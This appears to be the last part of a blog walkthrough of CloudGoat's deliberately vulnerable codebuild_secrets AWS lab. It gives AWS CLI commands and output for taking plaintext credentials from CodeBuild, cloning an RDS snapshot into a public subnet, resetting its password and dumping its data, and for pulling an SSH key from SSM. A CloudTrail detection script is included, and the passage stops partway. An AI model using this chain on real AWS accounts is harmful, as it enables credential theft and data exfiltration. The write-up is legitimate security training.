Working through every scenario of CloudGoat, the AWS attack-practice tool (final part)
Parts 1 and 2 are here.
codebuild_secrets (Large / Hard)
This scenario has two routes.
Both start from the IAM user Solo. In the first, you inspect CodeBuild to obtain the credentials of the user Calrissian and then, as Calrissian, abuse RDS snapshots. In the second, you fetch the instance's SSH key from an SSM parameter, use the metadata service to obtain the instance profile's keys, and retrieve the hidden information.
The initial information is as follows.
Outputs:
cloudgoat_output_aws_account_id = 7***********
cloudgoat_output_solo_access_key_id = A**************
cloudgoat_output_solo_secret_key = 1***************************
Investigate CodeBuild.
AWS CodeBuild command line reference - AWS CodeBuild
% aws codebuild list-projects --profile Solo --region us-east-1
{
    "projects": [
        "cg-codebuild-cgidysjfe61q7i"
    ]
}
% aws codebuild batch-get-projects --names cg-codebuild-cgidysjfe61q7i --profile Solo --region us-east-1
{
    "projects": [
        {
            "name": "cg-codebuild-cgidysjfe61q7i",
            "arn": "arn:aws:codebuild:us-east-1:746321857124:project/cg-codebuild-cgidysjfe61q7i",
            "source": {
                "type": "NO_SOURCE",
                "gitCloneDepth": 0,
                "buildspec": "version: 0.2\n\nphases:\n pre_build:\n commands:\n - echo \"This is CloudGoat's simpliest buildspec file ever (maybe)\"",
                "insecureSsl": false
            },
            "artifacts": {
                "type": "NO_ARTIFACTS",
                "overrideArtifactName": false
            },
            "cache": {
                "type": "NO_CACHE"
            },
            "environment": {
                "type": "LINUX_CONTAINER",
                "image": "aws/codebuild/standard:1.0",
                "computeType": "BUILD_GENERAL1_SMALL",
                "environmentVariables": [
                    {
                        "name": "calrissian-aws-access-key",
                        "value": "A**************",
                        "type": "PLAINTEXT"
                    },
                    {
                        "name": "calrissian-aws-secret-key",
                        "value": "n***************************",
                        "type": "PLAINTEXT"
                    }
                ],
                "privilegedMode": false,
                "imagePullCredentialsType": "CODEBUILD"
            },
            "serviceRole": "arn:aws:iam::7***********:role/code-build-cg-cgidysjfe61q7i-service-role",
            "timeoutInMinutes": 20,
            "queuedTimeoutInMinutes": 480,
            "encryptionKey": "arn:aws:kms:us-east-1:7***********:alias/aws/s3",
            "tags": [
                { "key": "Name", "value": "cg-codebuild-cgidysjfe61q7i" },
                { "key": "Scenario", "value": "codebuild-secrets" },
                { "key": "Stack", "value": "CloudGoat" }
            ],
            "created": "2021-01-07T13:41:45.738000+09:00",
            "lastModified": "2021-01-07T13:41:45.738000+09:00",
            "badge": { "badgeEnabled": false },
            "logsConfig": {
                "cloudWatchLogs": { "status": "ENABLED" },
                "s3Logs": { "status": "DISABLED", "encryptionDisabled": false }
            }
        }
    ],
    "projectsNotFound": []
}
Calrissian's credentials are stored in the project's environment variables (as PLAINTEXT), so use them.
% aws configure --profile Calrissian
AWS Access Key ID [None]: A**************
AWS Secret Access Key [None]: n***************************
Default region name [None]: us-east-1
Default output format [None]:
Investigate RDS.
% aws rds describe-db-instances --profile Calrissian
{ "DBInstances": [ { "DBInstanceIdentifier": "cg-rds-instance-cgidysjfe61q7i", "DBInstanceClass": "db.t2.micro", "Engine": "postgres", "DBInstanceStatus": "available", "MasterUsername": "cgadmin", "DBName": "securedb", "Endpoint": { "Address": "cg-rds-instance-cgidysjfe61q7i.cen1twfmlpzd.us-east-1.rds.amazonaws.com", "Port": 5432, "HostedZoneId": "Z2R2ITUGPM61AM" }, "AllocatedStorage": 20, "InstanceCreateTime": "2021-01-07T04:45:19.334000+00:00", "PreferredBackupWindow": "07:38-08:08", "BackupRetentionPeriod": 0, "DBSecurityGroups": [], "VpcSecurityGroups": [ { "VpcSecurityGroupId": "sg-09e426a8cb9f31e8a", "Status": "active" } ], "DBParameterGroups": [ { "DBParameterGroupName": "default.postgres9.6", "ParameterApplyStatus": "in-sync" } ], "AvailabilityZone": "us-east-1b", "DBSubnetGroup": { "DBSubnetGroupName": "cloud-goat-rds-subnet-group-cgidysjfe61q7i", "DBSubnetGroupDescription": "CloudGoat cgidysjfe61q7i Subnet Group", "VpcId": "vpc-0d54cc644cc046bf5", "SubnetGroupStatus": "Complete", "Subnets": [ { "SubnetIdentifier": "subnet-0b887402790487154", "SubnetAvailabilityZone": { "Name": "us-east-1a" }, "SubnetOutpost": {}, "SubnetStatus": "Active" }, { "SubnetIdentifier": "subnet-0207674e01d5abb99", "SubnetAvailabilityZone": { "Name": "us-east-1b" }, "SubnetOutpost": {}, "SubnetStatus": "Active" } ] }, (snip) "TagList": [ { "Key": "Name", "Value": "cg-rds-instance-cgidysjfe61q7i" }, { "Key": "Scenario", "Value": "codebuild-secrets" }, { "Key": "Stack", "Value": "CloudGoat" } ] } ] }
The aim is to take a snapshot, restore it into a network segment that can be reached, and connect to that restored instance.
The output shows that the instance above sits in a subnet group that appears to be private, and that a separate subnet group that appears to be public also exists.
(Whether a group is private or public is inferred from the subnet group description or from the subnet tags.)
To view the subnet details themselves, the command has to be run with Solo's permissions rather than Calrissian's.
% aws rds describe-db-subnet-groups --profile Calrissian
{ "DBSubnetGroups": [ { "DBSubnetGroupName": "cloud-goat-rds-subnet-group-cgidysjfe61q7i", "DBSubnetGroupDescription": "CloudGoat cgidysjfe61q7i Subnet Group", "VpcId": "vpc-0d54cc644cc046bf5", "SubnetGroupStatus": "Complete", "Subnets": [ { "SubnetIdentifier": "subnet-0b887402790487154", "SubnetAvailabilityZone": { "Name": "us-east-1a" }, "SubnetOutpost": {}, "SubnetStatus": "Active" }, { "SubnetIdentifier": "subnet-0207674e01d5abb99", "SubnetAvailabilityZone": { "Name": "us-east-1b" }, "SubnetOutpost": {}, "SubnetStatus": "Active" } ], "DBSubnetGroupArn": "arn:aws:rds:us-east-1:7***********:subgrp:cloud-goat-rds-subnet-group-cgidysjfe61q7i" }, { "DBSubnetGroupName": "cloud-goat-rds-testing-subnet-group-cgidysjfe61q7i", "DBSubnetGroupDescription": "CloudGoat cgidysjfe61q7i Subnet Group ONLY for Testing with Public Subnets", "VpcId": "vpc-0d54cc644cc046bf5", "SubnetGroupStatus": "Complete", "Subnets": [ { "SubnetIdentifier": "subnet-0ff83f3eceab80bba", "SubnetAvailabilityZone": { "Name": "us-east-1b" }, "SubnetOutpost": {}, "SubnetStatus": "Active" }, { "SubnetIdentifier": "subnet-04e2754b6ac56dabe", "SubnetAvailabilityZone": { "Name": "us-east-1a" }, "SubnetOutpost": {}, "SubnetStatus": "Active" } ], "DBSubnetGroupArn": "arn:aws:rds:us-east-1:7***********:subgrp:cloud-goat-rds-testing-subnet-group-cgidysjfe61q7i" }, { "DBSubnetGroupName": "default", "DBSubnetGroupDescription": "default", "VpcId": "vpc-116d946c", "SubnetGroupStatus": "Complete", "Subnets": [ { "SubnetIdentifier": "subnet-24a40d7b", "SubnetAvailabilityZone": { "Name": "us-east-1d" }, "SubnetOutpost": {}, "SubnetStatus": "Active" }, { "SubnetIdentifier": "subnet-2d6fc40c", "SubnetAvailabilityZone": { "Name": "us-east-1b" }, "SubnetOutpost": {}, "SubnetStatus": "Active" }, { "SubnetIdentifier": "subnet-6316e652", "SubnetAvailabilityZone": { "Name": "us-east-1e" }, "SubnetOutpost": {}, "SubnetStatus": "Active" }, { "SubnetIdentifier": "subnet-5c03ae3a", "SubnetAvailabilityZone": { "Name": "us-east-1a" }, "SubnetOutpost": {}, "SubnetStatus": "Active" }, { "SubnetIdentifier": "subnet-0d640203", "SubnetAvailabilityZone": { "Name": "us-east-1f" }, "SubnetOutpost": {}, "SubnetStatus": "Active" }, { "SubnetIdentifier": "subnet-e5502ca8", "SubnetAvailabilityZone": { "Name": "us-east-1c" }, "SubnetOutpost": {}, "SubnetStatus": "Active" } ], "DBSubnetGroupArn": "arn:aws:rds:us-east-1:7***********:subgrp:default" } ] }
% aws ec2 describe-subnets --profile Solo --region us-east-1
{ "Subnets": [ { "AvailabilityZone": "us-east-1c", "AvailabilityZoneId": "use1-az4", "AvailableIpAddressCount": 4091, "CidrBlock": "172.31.16.0/20", "DefaultForAz": true, "MapPublicIpOnLaunch": true, "MapCustomerOwnedIpOnLaunch": false, "State": "available", "SubnetId": "subnet-e5502ca8", "VpcId": "vpc-116d946c", "OwnerId": "7***********", "AssignIpv6AddressOnCreation": false, "Ipv6CidrBlockAssociationSet": [], "SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-e5502ca8" }, { "AvailabilityZone": "us-east-1f", "AvailabilityZoneId": "use1-az5", "AvailableIpAddressCount": 4091, "CidrBlock": "172.31.64.0/20", "DefaultForAz": true, "MapPublicIpOnLaunch": true, "MapCustomerOwnedIpOnLaunch": false, "State": "available", "SubnetId": "subnet-0d640203", "VpcId": "vpc-116d946c", "OwnerId": "7***********", "AssignIpv6AddressOnCreation": false, "Ipv6CidrBlockAssociationSet": [], "SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-0d640203" }, { "AvailabilityZone": "us-east-1a", "AvailabilityZoneId": "use1-az1", "AvailableIpAddressCount": 4091, "CidrBlock": "172.31.0.0/20", "DefaultForAz": true, "MapPublicIpOnLaunch": true, "MapCustomerOwnedIpOnLaunch": false, "State": "available", "SubnetId": "subnet-5c03ae3a", "VpcId": "vpc-116d946c", "OwnerId": "7***********", "AssignIpv6AddressOnCreation": false, "Ipv6CidrBlockAssociationSet": [], "SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-5c03ae3a" }, {
"AvailabilityZone": "us-east-1a", "AvailabilityZoneId": "use1-az1", "AvailableIpAddressCount": 250, "CidrBlock": "10.10.10.0/24", "DefaultForAz": false, "MapPublicIpOnLaunch": false, "MapCustomerOwnedIpOnLaunch": false, "State": "available", "SubnetId": "subnet-04e2754b6ac56dabe", "VpcId": "vpc-0d54cc644cc046bf5", "OwnerId": "7***********", "AssignIpv6AddressOnCreation": false, "Ipv6CidrBlockAssociationSet": [], "Tags": [ { "Key": "Stack", "Value": "CloudGoat" }, { "Key": "Name", "Value": "CloudGoat cgidysjfe61q7i Public Subnet #1" }, { "Key": "Scenario", "Value": "codebuild-secrets" } ], "SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-04e2754b6ac56dabe" }, { "AvailabilityZone": "us-east-1e", "AvailabilityZoneId": "use1-az3", "AvailableIpAddressCount": 4091, "CidrBlock": "172.31.48.0/20", "DefaultForAz": true, "MapPublicIpOnLaunch": true, "MapCustomerOwnedIpOnLaunch": false, "State": "available", "SubnetId": "subnet-6316e652", "VpcId": "vpc-116d946c", "OwnerId": "7***********", "AssignIpv6AddressOnCreation": false, "Ipv6CidrBlockAssociationSet": [], "SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-6316e652" }, { "AvailabilityZone": "us-east-1a", "AvailabilityZoneId": "use1-az1", "AvailableIpAddressCount": 251, "CidrBlock": "10.10.30.0/24", "DefaultForAz": false, "MapPublicIpOnLaunch": false, "MapCustomerOwnedIpOnLaunch": false, "State": "available", "SubnetId": "subnet-0b887402790487154", "VpcId": "vpc-0d54cc644cc046bf5", "OwnerId": "7***********", "AssignIpv6AddressOnCreation": false, "Ipv6CidrBlockAssociationSet": [], "Tags": [ { "Key": "Stack", "Value": "CloudGoat" }, { "Key": "Name", "Value": "CloudGoat cgidysjfe61q7i Private Subnet #1" }, { "Key": "Scenario", "Value": "codebuild-secrets" } ], "SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-0b887402790487154" }, { "AvailabilityZone": "us-east-1b", "AvailabilityZoneId": "use1-az2", "AvailableIpAddressCount": 250, "CidrBlock": "10.10.40.0/24", "DefaultForAz": false,
"MapPublicIpOnLaunch": false, "MapCustomerOwnedIpOnLaunch": false, "State": "available", "SubnetId": "subnet-0207674e01d5abb99", "VpcId": "vpc-0d54cc644cc046bf5", "OwnerId": "7***********", "AssignIpv6AddressOnCreation": false, "Ipv6CidrBlockAssociationSet": [], "Tags": [ { "Key": "Stack", "Value": "CloudGoat" }, { "Key": "Name", "Value": "CloudGoat cgidysjfe61q7i Private Subnet #2" }, { "Key": "Scenario", "Value": "codebuild-secrets" } ], "SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-0207674e01d5abb99" }, { "AvailabilityZone": "us-east-1b", "AvailabilityZoneId": "use1-az2", "AvailableIpAddressCount": 250, "CidrBlock": "10.10.20.0/24", "DefaultForAz": false, "MapPublicIpOnLaunch": false, "MapCustomerOwnedIpOnLaunch": false, "State": "available", "SubnetId": "subnet-0ff83f3eceab80bba", "VpcId": "vpc-0d54cc644cc046bf5", "OwnerId": "7***********", "AssignIpv6AddressOnCreation": false, "Ipv6CidrBlockAssociationSet": [], "Tags": [ { "Key": "Name", "Value": "CloudGoat cgidysjfe61q7i Public Subnet #2" }, { "Key": "Scenario", "Value": "codebuild-secrets" }, { "Key": "Stack", "Value": "CloudGoat" } ], "SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-0ff83f3eceab80bba" }, { "AvailabilityZone": "us-east-1b", "AvailabilityZoneId": "use1-az2", "AvailableIpAddressCount": 4091, "CidrBlock": "172.31.80.0/20", "DefaultForAz": true, "MapPublicIpOnLaunch": true, "MapCustomerOwnedIpOnLaunch": false, "State": "available", "SubnetId": "subnet-2d6fc40c", "VpcId": "vpc-116d946c", "OwnerId": "7***********", "AssignIpv6AddressOnCreation": false, "Ipv6CidrBlockAssociationSet": [], "SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-2d6fc40c" }, { "AvailabilityZone": "us-east-1d", "AvailabilityZoneId": "use1-az6", "AvailableIpAddressCount": 4091, "CidrBlock": "172.31.32.0/20", "DefaultForAz": true, "MapPublicIpOnLaunch": true, "MapCustomerOwnedIpOnLaunch": false, "State": "available", "SubnetId": "subnet-24a40d7b", "VpcId": "vpc-116d946c", "OwnerId":
"7***********", "AssignIpv6AddressOnCreation": false, "Ipv6CidrBlockAssociationSet": [], "SubnetArn": "arn:aws:ec2:us-east-1:7***********:subnet/subnet-24a40d7b" } ] }
Restore the DB from the snapshot into the public subnet group.
% aws rds restore-db-instance-from-db-snapshot --db-instance-identifier newinstance1 --db-snapshot-identifier snapshot1 --db-subnet-group-name cloud-goat-rds-testing-subnet-group-cgidysjfe61q7i --publicly-accessible --profile Calrissian
{ "DBInstance": { "DBInstanceIdentifier": "newinstance1", "DBInstanceClass": "db.t2.micro", "Engine": "postgres", "DBInstanceStatus": "creating", "MasterUsername": "cgadmin", "DBName": "securedb", "AllocatedStorage": 20, "PreferredBackupWindow": "07:38-08:08", "BackupRetentionPeriod": 0, "DBSecurityGroups": [], "VpcSecurityGroups": [ { "VpcSecurityGroupId": "sg-0097b2cef3e219411", "Status": "active" } ], "DBParameterGroups": [ { "DBParameterGroupName": "default.postgres9.6", "ParameterApplyStatus": "in-sync" } ], "DBSubnetGroup": { "DBSubnetGroupName": "cloud-goat-rds-testing-subnet-group-cgidysjfe61q7i", "DBSubnetGroupDescription": "CloudGoat cgidysjfe61q7i Subnet Group ONLY for Testing with Public Subnets", "VpcId": "vpc-0d54cc644cc046bf5", "SubnetGroupStatus": "Complete", "Subnets": [ { "SubnetIdentifier": "subnet-0ff83f3eceab80bba", "SubnetAvailabilityZone": { "Name": "us-east-1b" }, "SubnetOutpost": {}, "SubnetStatus": "Active" }, { "SubnetIdentifier": "subnet-04e2754b6ac56dabe", "SubnetAvailabilityZone": { "Name": "us-east-1a" }, "SubnetOutpost": {}, "SubnetStatus": "Active" } ] }, "PreferredMaintenanceWindow": "mon:04:03-mon:04:33", "PendingModifiedValues": {}, "MultiAZ": false, "EngineVersion": "9.6.19", "AutoMinorVersionUpgrade": true, "ReadReplicaDBInstanceIdentifiers": [], "LicenseModel": "postgresql-license", "OptionGroupMemberships": [ { "OptionGroupName": "default:postgres-9-6", "Status": "pending-apply" } ], "PubliclyAccessible": true, "StorageType": "gp2", "DbInstancePort": 0, "StorageEncrypted": false, "DbiResourceId": "db-5MMRXQLGIES4ZGGKRQSEBHLR3Q", "CACertificateIdentifier": "rds-ca-2019", "DomainMemberships": [], "CopyTagsToSnapshot": false, "MonitoringInterval": 0, "DBInstanceArn":
"arn:aws:rds:us-east-1:7***********:db:newinstance1", "IAMDatabaseAuthenticationEnabled": false, "PerformanceInsightsEnabled": false, "DeletionProtection": false, "AssociatedRoles": [], "TagList": [ { "Key": "Name", "Value": "cg-rds-instance-cgidysjfe61q7i" }, { "Key": "Scenario", "Value": "codebuild-secrets" }, { "Key": "Stack", "Value": "CloudGoat" } ] } }
The restored DB gets the VPC's default security group, so swap it for one that allows the connection.
cg-rds-psql-cgidysjfe61q7i (sg-09e426a8cb9f31e8a) looks like the right one.
% aws ec2 describe-security-groups --profile Calrissian
{ "SecurityGroups": [ { "Description": "default VPC security group", "GroupName": "default", "IpPermissions": [ { "IpProtocol": "-1", "IpRanges": [], "Ipv6Ranges": [], "PrefixListIds": [], "UserIdGroupPairs": [ { "GroupId": "sg-0097b2cef3e219411", "UserId": "7***********" } ] } ], "OwnerId": "7***********", "GroupId": "sg-0097b2cef3e219411", "IpPermissionsEgress": [ { "IpProtocol": "-1", "IpRanges": [ { "CidrIp": "0.0.0.0/0" } ], "Ipv6Ranges": [], "PrefixListIds": [], "UserIdGroupPairs": [] } ], "VpcId": "vpc-0d54cc644cc046bf5" }, { "Description": "CloudGoat cgidysjfe61q7i Security Group for EC2 Instance over SSH", "GroupName": "cg-ec2-ssh-cgidysjfe61q7i", "IpPermissions": [ { "FromPort": 22, "IpProtocol": "tcp", "IpRanges": [ { "CidrIp": "**.**.**.**/32" } ], "Ipv6Ranges": [], "PrefixListIds": [], "ToPort": 22, "UserIdGroupPairs": [] } ], "OwnerId": "7***********", "GroupId": "sg-07844914cbfefc7ce", "IpPermissionsEgress": [ { "IpProtocol": "-1", "IpRanges": [ { "CidrIp": "0.0.0.0/0" } ], "Ipv6Ranges": [], "PrefixListIds": [], "UserIdGroupPairs": [] } ], "Tags": [ { "Key": "Stack", "Value": "CloudGoat" }, { "Key": "Scenario", "Value": "codebuild-secrets" }, { "Key": "Name", "Value": "cg-ec2-ssh-cgidysjfe61q7i" } ], "VpcId": "vpc-0d54cc644cc046bf5" }, { "Description": "CloudGoat cgidysjfe61q7i Security Group for PostgreSQL RDS Instance", "GroupName": "cg-rds-psql-cgidysjfe61q7i", "IpPermissions": [ { "FromPort": 5432, "IpProtocol": "tcp", "IpRanges": [ { "CidrIp": "10.10.20.0/24" }, { "CidrIp": "10.10.30.0/24" }, { "CidrIp": "10.10.40.0/24" }, { "CidrIp": "**.**.**.**/32" }, { "CidrIp": "10.10.10.0/24" } ], "Ipv6Ranges": [], "PrefixListIds": [], "ToPort": 5432, "UserIdGroupPairs": [] } ], "OwnerId": "7***********", "GroupId": "sg-09e426a8cb9f31e8a", "IpPermissionsEgress": [ { "IpProtocol": "-1", "IpRanges": [ { "CidrIp": "0.0.0.0/0" } ], "Ipv6Ranges": [], "PrefixListIds": [], "UserIdGroupPairs": [] } ],
"VpcId": "vpc-0d54cc644cc046bf5" }, { "Description": "default VPC security group", "GroupName": "default", "IpPermissions": [ { "IpProtocol": "-1", "IpRanges": [], "Ipv6Ranges": [], "PrefixListIds": [], "UserIdGroupPairs": [ { "GroupId": "sg-0d531a31", "UserId": "7***********" } ] } ], "OwnerId": "7***********", "GroupId": "sg-0d531a31", "IpPermissionsEgress": [ { "IpProtocol": "-1", "IpRanges": [ { "CidrIp": "0.0.0.0/0" } ], "Ipv6Ranges": [], "PrefixListIds": [], "UserIdGroupPairs": [] } ], "VpcId": "vpc-116d946c" } ] }
% aws rds modify-db-instance --db-instance-identifier newinstance1 --vpc-security-group-ids sg-09e426a8cb9f31e8a --profile Calrissian
{ "DBInstance": { "DBInstanceIdentifier": "newinstance1", "DBInstanceClass": "db.t2.micro", "Engine": "postgres", "DBInstanceStatus": "available", "MasterUsername": "cgadmin", "DBName": "securedb", "Endpoint": { "Address": "newinstance1.cen1twfmlpzd.us-east-1.rds.amazonaws.com", "Port": 5432, "HostedZoneId": "Z2R2ITUGPM61AM" }, "AllocatedStorage": 20, "InstanceCreateTime": "2021-01-14T03:13:42.402000+00:00", "PreferredBackupWindow": "07:38-08:08", "BackupRetentionPeriod": 0, "DBSecurityGroups": [], "VpcSecurityGroups": [ { "VpcSecurityGroupId": "sg-09e426a8cb9f31e8a", "Status": "adding" }, { "VpcSecurityGroupId": "sg-0097b2cef3e219411", "Status": "removing" } ], "DBParameterGroups": [ { "DBParameterGroupName": "default.postgres9.6", "ParameterApplyStatus": "in-sync" } ], "AvailabilityZone": "us-east-1b", "DBSubnetGroup": { "DBSubnetGroupName": "cloud-goat-rds-testing-subnet-group-cgidysjfe61q7i", "DBSubnetGroupDescription": "CloudGoat cgidysjfe61q7i Subnet Group ONLY for Testing with Public Subnets", "VpcId": "vpc-0d54cc644cc046bf5", "SubnetGroupStatus": "Complete", "Subnets": [ { "SubnetIdentifier": "subnet-0ff83f3eceab80bba", "SubnetAvailabilityZone": { "Name": "us-east-1b" }, "SubnetOutpost": {}, "SubnetStatus": "Active" }, { "SubnetIdentifier": "subnet-04e2754b6ac56dabe", "SubnetAvailabilityZone": { "Name":
"us-east-1a" }, "SubnetOutpost": {}, "SubnetStatus": "Active" } ] }, (snip) "TagList": [ { "Key": "Name", "Value": "cg-rds-instance-cgidysjfe61q7i" }, { "Key": "Scenario", "Value": "codebuild-secrets" }, { "Key": "Stack", "Value": "CloudGoat" } ] } }
Next, change the master password so the restored copy can be logged into.
% aws rds modify-db-instance --db-instance-identifier newinstance1 --master-user-password cgpassword --profile Calrissian
{ "DBInstance": { "DBInstanceIdentifier": "newinstance1", "DBInstanceClass": "db.t2.micro", "Engine": "postgres", "DBInstanceStatus": "available", "MasterUsername": "cgadmin", "DBName": "securedb", "Endpoint": { "Address": "newinstance1.cen1twfmlpzd.us-east-1.rds.amazonaws.com", "Port": 5432, "HostedZoneId": "Z2R2ITUGPM61AM" }, "AllocatedStorage": 20, "InstanceCreateTime": "2021-01-14T03:13:42.402000+00:00", "PreferredBackupWindow": "07:38-08:08", "BackupRetentionPeriod": 0, "DBSecurityGroups": [], "VpcSecurityGroups": [ { "VpcSecurityGroupId": "sg-09e426a8cb9f31e8a", "Status": "active" } ], "DBParameterGroups": [ { "DBParameterGroupName": "default.postgres9.6", "ParameterApplyStatus": "in-sync" } ], "AvailabilityZone": "us-east-1b", "DBSubnetGroup": { "DBSubnetGroupName": "cloud-goat-rds-testing-subnet-group-cgidysjfe61q7i", "DBSubnetGroupDescription": "CloudGoat cgidysjfe61q7i Subnet Group ONLY for Testing with Public Subnets", "VpcId": "vpc-0d54cc644cc046bf5", "SubnetGroupStatus": "Complete", "Subnets": [ { "SubnetIdentifier": "subnet-0ff83f3eceab80bba", "SubnetAvailabilityZone": { "Name": "us-east-1b" }, "SubnetOutpost": {}, "SubnetStatus": "Active" }, { "SubnetIdentifier": "subnet-04e2754b6ac56dabe", "SubnetAvailabilityZone": { "Name": "us-east-1a" }, "SubnetOutpost": {}, "SubnetStatus": "Active" } ] }, (snip) "TagList": [ { "Key": "Name", "Value": "cg-rds-instance-cgidysjfe61q7i" }, { "Key": "Scenario", "Value": "codebuild-secrets" }, { "Key": "Stack", "Value": "CloudGoat" } ] } }
The DB can now be reached from outside; connecting to it and reading the stored data completes the scenario.
% psql postgresql://cgadmin:cgpassword@newinstance1.cen1twfmlpzd.us-east-1.rds.amazonaws.com:5432/securedb
psql (13.1, server 9.6.19)
SSL connection (protocol: TLSv1.2, cipher: ECDHE-RSA-AES256-GCM-SHA384, bits: 256, compression: off)
Type "help" for help.

securedb=> \dt
                  List of relations
 Schema |         Name          | Type  |  Owner
--------+-----------------------+-------+---------
 public | sensitive_information | table | cgadmin
(1 row)

securedb=> select * from sensitive_information;
 name |                   value
------+--------------------------------------------
 Key1 | V\!C70RY-PvyOSDptpOVNX2JDS9K9jVetC1xI4gMO4
 Key2 | V\!C70RY-JpZFReKtvUiWuhyPGF20m4SDYJtOTxws6
(2 rows)
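The route above (restore a snapshot into a public subnet group, swap the security group, reset the master password) leaves a distinctive sequence in CloudTrail. The following is an added example, not code from the original post or from CloudGoat: it scores RDS control-plane events per target DB instance and reports any instance that accumulates two or more of those signals. The records are constructed with placeholder account ids and names, and the request-parameter key names follow CloudTrail's RDS conventions as I recall them, which is an assumption.

```python
"""Flag the RDS snapshot-clone takeover chain in CloudTrail records.

Added example, not part of the original post. Works on the `Records` list of
a CloudTrail JSON file; the sample below is constructed with placeholder ids.
"""
import json
from collections import defaultdict

# Constructed CloudTrail-style records for the route above: snapshot, restore
# into a public subnet group, swap the security group, reset the master password.
# Account id, ARNs and resource names are placeholders, not the page's values.
SAMPLE_RECORDS = {"Records": [
    {"eventSource": "rds.amazonaws.com", "eventName": "CreateDBSnapshot",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/calrissian"},
     "requestParameters": {"dBInstanceIdentifier": "cg-rds-instance-EXAMPLE",
                           "dBSnapshotIdentifier": "snapshot1"}},
    {"eventSource": "rds.amazonaws.com", "eventName": "RestoreDBInstanceFromDBSnapshot",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/calrissian"},
     "requestParameters": {"dBInstanceIdentifier": "newinstance1",
                           "dBSnapshotIdentifier": "snapshot1",
                           "dBSubnetGroupName": "rds-testing-subnet-group-EXAMPLE",
                           "publiclyAccessible": True}},
    {"eventSource": "rds.amazonaws.com", "eventName": "ModifyDBInstance",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/calrissian"},
     "requestParameters": {"dBInstanceIdentifier": "newinstance1",
                           "vpcSecurityGroupIds": ["sg-EXAMPLE"]}},
    {"eventSource": "rds.amazonaws.com", "eventName": "ModifyDBInstance",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/calrissian"},
     "requestParameters": {"dBInstanceIdentifier": "newinstance1",
                           "masterUserPassword": "HIDDEN"}},
    {"eventSource": "rds.amazonaws.com", "eventName": "DescribeDBInstances",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/ops"},
     "requestParameters": None},
]}


def rds_signals(record):
    """Map one record to (target instance, [signals]) or None if irrelevant."""
    if record.get("eventSource") != "rds.amazonaws.com":
        return None
    params = record.get("requestParameters") or {}
    target = params.get("dBInstanceIdentifier")
    if not target:
        return None
    name = record.get("eventName")
    signals = []
    if name == "RestoreDBInstanceFromDBSnapshot":
        signals.append("restored_from_snapshot")
        if params.get("publiclyAccessible"):
            signals.append("restored_public")
    elif name == "ModifyDBInstance":
        if "masterUserPassword" in params:
            signals.append("master_password_reset")
        if params.get("vpcSecurityGroupIds"):
            signals.append("security_group_changed")
        if params.get("publiclyAccessible"):
            signals.append("made_public")
    return (target, signals) if signals else None


def analyze_rds_events(records, threshold=2):
    """Group signals per DB instance and report instances with at least
    `threshold` distinct signals, plus the identities that produced them.
    A lone restore or password reset is routine; the combination is the chain."""
    per_instance = defaultdict(lambda: {"signals": set(), "actors": set()})
    for rec in records:
        hit = rds_signals(rec)
        if hit is None:
            continue
        target, signals = hit
        per_instance[target]["signals"].update(signals)
        per_instance[target]["actors"].add(rec.get("userIdentity", {}).get("arn"))
    return {inst: {"signals": sorted(v["signals"]), "actors": sorted(v["actors"])}
            for inst, v in per_instance.items()
            if len(v["signals"]) >= threshold}


def analyze_cloudtrail_json(text):
    """Parse a CloudTrail log file body and analyze its Records list."""
    return analyze_rds_events(json.loads(text).get("Records", []))


if __name__ == "__main__":
    for inst, info in analyze_cloudtrail_json(json.dumps(SAMPLE_RECORDS)).items():
        print(inst, info)
```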
Next, try the other route.
First, listing the SSM parameters reveals the SSH key material.
% aws ssm describe-parameters --profile Solo --region us-east-1
{
    "Parameters": [
        {
            "Name": "cg-ec2-private-key-cgidysjfe61q7i",
            "Type": "String",
            "LastModifiedDate": "2021-01-07T13:41:31.423000+09:00",
            "LastModifiedUser": "arn:aws:iam::7***********:user/cloudgoat",
            "Description": "cg-ec2-private-key-cgidysjfe61q7i",
            "Version": 1,
            "Tier": "Standard",
            "Policies": [],
            "DataType": "text"
        },
        {
            "Name": "cg-ec2-public-key-cgidysjfe61q7i",
            "Type": "String",
            "LastModifiedDate": "2021-01-07T13:41:31.263000+09:00",
            "LastModifiedUser": "arn:aws:iam::7***********:user/cloudgoat",
            "Description": "cg-ec2-public-key-cgidysjfe61q7i",
            "Version": 1,
            "Tier": "Standard",
            "Policies": [],
            "DataType": "text"
        }
    ]
}
% aws ssm get-parameter --name cg-ec2-private-key-cgidysjfe61q7i --profile Solo --region us-east-1
{
    "Parameter": {
        "Name": "cg-ec2-private-key-cgidysjfe61q7i",
        "Type": "String",
        "Value": "(snip)",
        "Version": 1,
        "LastModifiedDate": "2021-01-07T13:41:31.423000+09:00",
        "ARN": "arn:aws:ssm:us-east-1:746321857124:parameter/cg-ec2-private-key-cgidysjfe61q7i",
        "DataType": "text"
    }
}
Save the key above to a file (take care: the value contains literal \n newline sequences that must be turned into real line breaks) and try connecting to the EC2 instance.
For the login user, the instance's Name tag hints at Ubuntu, so try ubuntu.
% aws ec2 describe-instances --profile Solo --region us-east-1
